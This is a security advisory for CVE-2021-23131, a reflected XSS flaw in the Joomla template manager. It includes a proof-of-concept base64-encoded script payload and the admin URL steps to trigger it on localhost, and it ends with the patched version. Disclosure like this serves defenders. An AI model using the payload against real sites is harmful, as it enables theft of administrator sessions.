CVE-2021-23131

Overview

An issue was discovered in Joomla! 3.2.0 through 3.9.24. Missing input validation within the template manager.

Details

The com_template component in the admin view of Joomla does not properly sanitize query parameters encoded in base64, resulting in an XSS vulnerability. With a valid request token in hand, an attacker can lure an admin to click upon a URL with a malicious base64 encoded string, which will execute arbitrary javascript code on the admin's browser.

PoC Details

Encode the following payload to base64: `/v/ <script>alert(document.cookie)</script>`. Should result in the following string: `L3YvICA8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=` Login to Joomla as administrator. On the toolbar at the top of the page, click on 'Extensions', 'Templates' and click on 'Templates'. On the new page, click on the 'Protostar Details and Files'. Go to the 'Create Overrides' tab. Under 'Layouts', click on the 'joomla' folder then right click the 'content' link and copy link. Paste the copied link in the url, and replace the 'folder' request parameter value with the base64 string generated earlier. Click enter, and notice the payload getting executed.

PoC Code

// encode this:
/v/  <script>alert(document.cookie)</script>

// encoded base64 string. Insert it into the folder query parameter value:
L3YvICA8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=

// base64 string inserted to folder query parameter value:
http://localhost/joomla/administrator/index.php?option=com_templates&view=template&task=template.overrides&folder=L3YvICA8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&id=506&file=aG9tZQ&1f2655e0bd4aa0b883d373f33a65c058=1

Affected Environments

3.2.0-3.9.24

Prevention

Upgrade to version 3.9.25